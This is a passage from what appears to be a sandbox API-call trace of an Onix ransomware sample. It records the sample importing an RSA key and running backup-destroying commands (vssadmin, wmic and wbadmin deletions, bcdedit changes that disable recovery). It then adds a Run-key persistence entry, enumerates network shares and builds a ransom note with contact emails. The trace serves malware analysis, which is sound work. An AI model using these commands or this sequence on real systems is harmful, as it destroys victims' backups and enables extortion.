KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x26cd0c, pcbBinary=0x26d510, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x26cd0c, pcbBinary=0x26d510, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0043.323] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x26cd0c, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x26d514, pcbStructInfo=0x26d50c | out: pvStructInfo=0x26d514, pcbStructInfo=0x26d50c) returned 1 [0043.323] CryptAcquireContextW (in: phProv=0x12671a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x12671a0*=0x4580e8) returned 1 [0043.323] CryptImportPublicKeyInfo (in: hCryptProv=0x4580e8, dwCertEncodingType=0x1, pInfo=0x43e318*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43e348*, PublicKey.cbData=0x10e, PublicKey.pbData=0x43e350*, PublicKey.cUnusedBits=0x0), phKey=0x1267190 | out: phKey=0x1267190*=0x447a28) returned 1 [0043.323] CryptAcquireContextW (in: phProv=0x12671a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x12671a0*=0x458170) returned 1 [0043.324] CryptImportPublicKeyInfo (in: hCryptProv=0x458170, dwCertEncodingType=0x1, pInfo=0x43e318*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43e348*, PublicKey.cbData=0x10e, PublicKey.pbData=0x43e350*, PublicKey.cUnusedBits=0x0), phKey=0x1267190 | out: phKey=0x1267190*=0x447a68) returned 1 [0043.324] CryptAcquireContextW (in: phProv=0x12671a4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12671a4*=0x4581f8) returned 1 [0043.325] LocalFree (hMem=0x43e318) returned 0x0 [0043.325] LocalFree (hMem=0x46a0f0) returned 0x0 [0043.325] LocalFree (hMem=0x43de78) returned 0x0 [0043.325] GetProcessHeap () returned 0x410000 [0043.325] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46e5e0 | out: hHeap=0x410000) returned 1 [0043.325] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.325] CryptDestroyKey (hKey=0x447368) returned 1 [0043.325] CryptDestroyKey (hKey=0x4479e8) returned 1 [0043.325] CryptReleaseContext (hProv=0x457f50, dwFlags=0x0) returned 1 [0043.325] CryptReleaseContext (hProv=0x457db8, dwFlags=0x0) returned 1 [0043.325] Wow64DisableWow64FsRedirection (in: OldValue=0x26d514 | out: OldValue=0x26d514*=0x0) returned 1 [0043.325] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x26d4b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26d504 | out: lpCommandLine="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x26d504*(hProcess=0x378, hThread=0x374, dwProcessId=0x840, dwThreadId=0xa48)) returned 1 [0043.336] CloseHandle (hObject=0x378) returned 1 [0043.336] CloseHandle (hObject=0x374) returned 1 [0043.336] Wow64DisableWow64FsRedirection (in: OldValue=0x26d514 | out: OldValue=0x26d514*=0x1) returned 1 [0043.336] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x26d4b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26d504 | out: lpCommandLine="/C bcdedit /set {default} recoveryenabled no", lpProcessInformation=0x26d504*(hProcess=0x378, hThread=0x374, dwProcessId=0xa54, dwThreadId=0x570)) returned 1 [0043.341] CloseHandle (hObject=0x378) returned 1 [0043.341] CloseHandle (hObject=0x374) returned 1 [0043.341] Wow64DisableWow64FsRedirection (in: OldValue=0x26d514 | out: OldValue=0x26d514*=0x1) returned 1 [0043.341] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x26d4b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26d504 | out: lpCommandLine="/C wbadmin delete catalog -quiet", lpProcessInformation=0x26d504*(hProcess=0x378, hThread=0x374, dwProcessId=0x54c, dwThreadId=0x35c)) returned 1 [0043.582] CloseHandle (hObject=0x378) returned 1 [0043.582] CloseHandle (hObject=0x374) returned 1 [0043.582] Wow64DisableWow64FsRedirection (in: OldValue=0x26d514 | out: OldValue=0x26d514*=0x1) returned 1 [0043.582] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x26d4b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26d504 | out: lpCommandLine="/C vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x26d504*(hProcess=0x378, hThread=0x374, dwProcessId=0x568, dwThreadId=0x6ec)) returned 1 [0043.587] CloseHandle (hObject=0x378) returned 1 [0043.587] CloseHandle (hObject=0x374) returned 1 [0043.587] Wow64DisableWow64FsRedirection (in: OldValue=0x26d514 | out: OldValue=0x26d514*=0x1) returned 1 [0043.587] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit.exe /set {current} nx AlwaysOff", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x26d4b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26d504 | out: lpCommandLine="/C bcdedit.exe /set {current} nx AlwaysOff", lpProcessInformation=0x26d504*(hProcess=0x378, hThread=0x374, dwProcessId=0x43c, dwThreadId=0x670)) returned 1 [0043.591] CloseHandle (hObject=0x378) returned 1 [0043.591] CloseHandle (hObject=0x374) returned 1 [0043.591] Wow64DisableWow64FsRedirection (in: OldValue=0x26d514 | out: OldValue=0x26d514*=0x1) returned 1 [0043.592] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C wmic SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x26d4b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26d504 | out: lpCommandLine="/C wmic SHADOWCOPY DELETE", lpProcessInformation=0x26d504*(hProcess=0x378, hThread=0x374, dwProcessId=0x32c, dwThreadId=0x6a4)) returned 1 [0043.596] CloseHandle (hObject=0x378) returned 1 [0043.596] CloseHandle (hObject=0x374) returned 1 [0043.596] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26d0fc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvkjfc.exe")) returned 0x30 [0043.596] GetWindowsDirectoryW (in: lpBuffer=0x26d308, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0043.596] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\rvkjfc.exe" | out: lpString1="C:\\Windows\\rvkjfc.exe") returned="C:\\Windows\\rvkjfc.exe" [0043.596] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvkjfc.exe"), lpNewFileName="C:\\Windows\\rvkjfc.exe" (normalized: "c:\\windows\\rvkjfc.exe"), bFailIfExists=0) returned 1 [0043.615] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x26d514 | out: phkResult=0x26d514*=0x378) returned 0x0 [0043.615] lstrlenW (lpString="C:\\Windows\\rvkjfc.exe") returned 21 [0043.615] RegSetValueExW (in: hKey=0x378, lpValueName="rvkjfc.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\rvkjfc.exe", cbData=0x2b | out: lpData="C:\\Windows\\rvkjfc.exe") returned 0x0 [0043.615] RegCloseKey (hKey=0x378) returned 0x0 [0043.615] GetLogicalDriveStringsW (in: nBufferLength=0x400, lpBuffer=0x26d0c8 | out: lpBuffer="C:\\") returned 0x4 [0043.615] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.615] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x430a70 [0043.615] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.615] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.615] lstrlenW (lpString="C:\\") returned 3 [0043.616] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x26d510 | out: lphEnum=0x26d510*=0x447368) returned 0x0 [0044.516] WNetEnumResourceW (in: hEnum=0x447368, lpcCount=0x26d514, lpBuffer=0x2654f0, lpBufferSize=0x26d50c | out: lpcCount=0x26d514, lpBuffer=0x2654f0, lpBufferSize=0x26d50c) returned 0x0 [0044.516] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2654f0, lphEnum=0x2654d0 | out: lphEnum=0x2654d0*=0x46d2b8) returned 0x0 [0044.544] WNetEnumResourceW (in: hEnum=0x46d2b8, lpcCount=0x2654d4, lpBuffer=0x25d4b0, lpBufferSize=0x2654cc | out: lpcCount=0x2654d4, lpBuffer=0x25d4b0, lpBufferSize=0x2654cc) returned 0x103 [0044.544] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x265510, lphEnum=0x2654d0 | out: lphEnum=0x2654d0*=0x265510) returned 0x4b8 [0063.691] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x265530, lphEnum=0x2654d0 | out: lphEnum=0x2654d0*=0x265530) returned 0x4c6 [0063.704] WNetCloseEnum (hEnum=0x447368) returned 0x0 [0063.707] GetCurrentProcess () returned 0xffffffff [0063.708] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0063.711] GetProcessHeap () returned 0x410000 [0063.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x46b550 [0063.711] lstrcatW (in: lpString1="", lpString2="." | out: lpString1=".") returned="." [0063.711] lstrcatW (in: lpString1=".", lpString2="12781717671972521061" | out: lpString1=".12781717671972521061") returned=".12781717671972521061" [0063.711] lstrcatW (in: lpString1=".12781717671972521061", lpString2="." | out: lpString1=".12781717671972521061.") returned=".12781717671972521061." [0063.711] lstrcatW (in: lpString1=".12781717671972521061.", lpString2="Ad_finem@tutanota.com" | out: lpString1=".12781717671972521061.Ad_finem@tutanota.com") returned=".12781717671972521061.Ad_finem@tutanota.com" [0063.711] lstrcatW (in: lpString1=".12781717671972521061.Ad_finem@tutanota.com", lpString2=".ONIX" | out: lpString1=".12781717671972521061.Ad_finem@tutanota.com.ONIX") returned=".12781717671972521061.Ad_finem@tutanota.com.ONIX" [0063.711] lstrlenW (lpString=".12781717671972521061.Ad_finem@tutanota.com.ONIX") returned 48 [0063.711] lstrlenW (lpString="9rAci/wLSw4DHF3VbwpmUmu4AjEuxf8Bcf5vKIslGx/VeYMkyLXFMTHyX/y2INDyVok5GwA3pS3zhB8JBp+lz4uF10xgHhPz5S1zhensJTXawzPi819GmuAC+qvdsPxIvE5hYR5YUS/2SVcArO8sRBk3RRUPi8MyEnTsGG9cIVRqADT4nh/Yhsg8HXICHHLH+Heq1hGMoBXBeQwt07PHl6hQ+Y3yBkdSpvrRdgzkRTNJTvPFNHDAuUwM/PtLs2tP34mEnotCwbDQWco/dlnQUN5L5DCsDNEVuRAMpYAFqNS6FuoRNqUUopepXz98frC3LHLr66y0sHj6KC9s/G6c7cUME4CDUjRGAaRtuoSZouqLQ4wJEziPAawSmsOQoLeJ2LLSE7e0DOc0gKo4+JJZ9nOW4qUd/sJyD+Vllm2rJ/ciTgqIASkkjkp9+b6HV7HfJvQfliwueLcJGA1B+eQg48VY/h2E8wihBtPCp1hK8nd+eDdtSIAU816USxSbjcsah7lnD6jrm72vlV5h1GCqjmMW7fcGUxzeX0Fc4evg3ZA3fhnJR+UzgmzVDiWRIsJuFz5FY5ZTLH0CQqJHQE44VeoGDvdWgtMHYjZXzh/CPDEzm3m7TvS+2o0uvXwNGq4WO6C2I0jfhAuq3UCTN2F0X+tDFEXDqGtHtdKFyv9OFA8VN95LJ56OTfjSvQkobUkwlplSCB17JtggC9cLTtoiHWAfpw9VsiXzjFpRV4WhCyJi7m8G0CQBLEC7IK9wAy9yOVWP0BZlH+vger+5u5kEKROl6NgvqvWBJ0VrvG5tw+wSeAUplBQH620SnoR4R36APlMStmFKnMB2NXDqBvK/fZ+Vyho8IwuIbiOTQzx0wYdaXMAy7U4ViDDu0DbsroEXyR1Cc958uG1b9lE+Vvi8B7mbtAlQdsbMZFHWO0rzh84dco9xKrRlfArHqiVLuFuBpOP1t66ahHu3lGjL5IH9kG9ZSeiFGp5CcMTLsvZOLbeCNaQT4k8xpG91/a2v/uOGdm7Sp7kmwj0/RKEJ94SiE4yASzPb3vaA9bXGRcaWEIZiAdbHCGmXr3eRBIjOn7NhaXlstTd53SIntDGeNNk+O7tvRjPom33YL+cq8YMMeG8wZY5H7p3XJEKof5CR1zJvd6Llrj4kWZ6anNX/zsnnd/41R1A5n0Ff4xp9eEEZXa4zdPG9Qpgq0fy8+76m2tsO2w+1U5YGb980lX0R4JA2wyRGM0l1QFW8P3Re6/cshU6OBkVR8aB/ozA6aMioaIyDTXTeqgMiBYQPN3dYmv+KVFP0js6eqeALhdNihNcRKKpmX9dxLjnAA0a3a2A4xlqD+3/NfuHLJG3p0XSLaGiVT4Y+nmuWTvFheunk9x4R8vW+4s1mrApmpLaE/QVJp40L5ssylZZ1GwfSjZf6qErw/bDBcL70nwXtiOmq2nqNZ0yfRWVYD15olYy1UQddeiYU8MUmJzpF5Wqdn/X+lqoN336AbGIY0F+10z5ZqVsy3pc1X4XGlseWHx5qMcTVCVLjXEnlxOn5HiAZJG3BEf7SprkC2piQZbCg2FYYBnOpTemA2o72Tjt9GcY57CA3M1V6yiSLFNQrL+k9n+mdiWz2onoQkp7G3lU5Jbk0aNE5f614Pn9DMmOrfa03/NLEanEWjkTHAFtokbPO+nmsLe/CM+N+7jl5QeWXHuz+nASu19cmaxmN38h5rwAld9tiiTffhwpkrwQtId5amR/ar2jMDHTaVRmVOINYo3dfekU+99jK536/c6GcKbZ9X7uX4vdaPOkh8TWTUy5WmEydzwWpcbxTdItmfmJ0rVIz60K0ur7Oi270WgZ4CEklFqsLgK7WxFS8V8ZKGheT5nr9fvexyIxchQqRCUXzd8WbTSOnTNFy5cE37EHTxSOt9COgLW5KAh/FHel4gnjk0A43umug8A==") returned 1944 [0063.711] GetProcessHeap () returned 0x410000 [0063.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1fa0) returned 0x479438 [0063.711] lstrcpyA (in: lpString1=0x479438, lpString2="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address " | out: lpString1="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address ") returned="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address " [0063.711] lstrcatA (in: lpString1="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address ", lpString2="\r\n Ad_finem@tutanota.com \r\n adfinem001@cock.li \r\n Ad_finem001@protonmail.com \r\n" | out: lpString1="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n Ad_finem@tutanota.com \r\n adfinem001@cock.li \r\n Ad_finem001@protonmail.com \r\n") returned="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n Ad_finem@tutanota.com \r\n adfinem001@cock.li \r\n Ad_finem001@protonmail.com \r\n" [0063.711] lstrcatA (in: lpString1="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n Ad_finem@tutanota.com \r\n adfinem001@cock.li \r\n Ad_finem001@protonmail.com \r\n", lpString2="\"

Here is you personal id, send it to us


" | out: lpString1="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n Ad_finem@tutanota.com \r\n adfinem001@cock.li \r\n Ad_finem001@protonmail.com \r\n\"

Here is you personal id, send it to us


") returned="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n Ad_finem@tutanota.com \r\n adfinem001@cock.li \r\n Ad_finem001@protonmail.com \r\n\"

Here is you personal id, send it to us


" [0063.711] lstrlenA (lpString="

Onix

I am truly sorry to inform you that all your important files are crypted.

If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder

Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever

Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers

Contact me on this email address \r\n Ad_finem@tutanota.com \r\n adfinem001@cock.li \r\n Ad_finem001@protonmail.com \r\n\"

Here is you personal id, send it to us


") returned 1353 [0063.711] lstrlenA (lpString="\"

Here is you personal id, send it to us


") returned 75 [0063.712] Sleep (dwMilliseconds=0x3e8) [0064.730] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x31c) returned 0x4675b0 [0064.732] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x46e068 [0064.733] RtlInitializeConditionVariable () returned 0x46e06c [0064.735] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x470a68 [0064.735] RtlInitializeConditionVariable () returned 0x470a70 [0064.735] GetCurrentThreadId () returned 0x6c0 [0064.735] GetCurrentThreadId () returned 0x6c0 [0064.736] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x46d3b8 [0064.737] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1212270, phModule=0x46d3c4 | out: phModule=0x46d3c4*=0x1210000) returned 1 [0064.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x12208f4, lpParameter=0x46d3b8, dwCreationFlags=0x0, lpThreadId=0x26d4a8 | out: lpThreadId=0x26d4a8*=0x9d0) returned 0x3c8 [0064.738] SleepConditionVariableSRW (in: ConditionVariable=0x46e06c, SRWLock=0x470a70, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x46e06c, SRWLock=0x470a70) returned 1 [0064.931] GetCurrentThreadId () returned 0x6c0 [0064.931] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0064.931] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46e068 | out: hHeap=0x410000) returned 1 [0064.931] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466518 [0064.931] GetCurrentThreadId () returned 0x6c0 [0064.931] WaitForSingleObjectEx (hHandle=0x3c8, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 2 os_tid = 0x738 Thread: id = 3 os_tid = 0x734 Thread: id = 4 os_tid = 0x664 Thread: id = 5 os_tid = 0x5bc Thread: id = 6 os_tid = 0x5e0 Thread: id = 7 os_tid = 0x754 Thread: id = 21 os_tid = 0x25c Thread: id = 165 os_tid = 0x9d0 [0064.892] GetLastError () returned 0x0 [0064.894] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x364) returned 0x47b3e0 [0064.895] SetLastError (dwErrCode=0x0) [0064.895] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0064.895] GetLastError () returned 0x57 [0064.895] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0064.906] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0064.906] GetLastError () returned 0x57 [0064.906] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0064.907] GetCurrentThreadId () returned 0x9d0 [0064.907] GetCurrentThreadId () returned 0x9d0 [0064.907] RtlWakeConditionVariable () returned 0x1 [0064.908] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466478 [0064.908] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471f38 [0064.908] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2) returned 0x4664e8 [0064.917] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4664e8 | out: hHeap=0x410000) returned 1 [0064.917] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2) returned 0x4664e8 [0064.918] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x463bf8 [0064.918] GetLastError () returned 0x7e [0064.918] SetLastError (dwErrCode=0x7e) [0064.918] GetLastError () returned 0x7e [0064.918] SetLastError (dwErrCode=0x7e) [0064.918] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb8) returned 0x46e918 [0064.918] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6a6) returned 0x47b750 [0064.919] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b750 | out: hHeap=0x410000) returned 1 [0064.919] GetLastError () returned 0x7e [0064.919] SetLastError (dwErrCode=0x7e) [0064.920] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6) returned 0x4664f8 [0064.920] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2) returned 0x466508 [0064.920] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x466518 [0064.920] GetLastError () returned 0x7e [0064.920] SetLastError (dwErrCode=0x7e) [0064.920] GetLastError () returned 0x7e [0064.920] SetLastError (dwErrCode=0x7e) [0064.920] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb8) returned 0x46e9d8 [0064.920] GetLastError () returned 0x7e [0064.920] SetLastError (dwErrCode=0x7e) [0064.920] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6a6) returned 0x47b750 [0064.920] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b750 | out: hHeap=0x410000) returned 1 [0064.920] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4664f8 | out: hHeap=0x410000) returned 1 [0064.920] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46e918 | out: hHeap=0x410000) returned 1 [0064.920] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466518 | out: hHeap=0x410000) returned 1 [0064.920] GetLastError () returned 0x7e [0064.920] SetLastError (dwErrCode=0x7e) [0064.920] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6) returned 0x466518 [0064.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2) returned 0x4664f8 [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x200) returned 0x47b750 [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] GetLastError () returned 0x7e [0064.921] SetLastError (dwErrCode=0x7e) [0064.921] RtlAllocateHeap 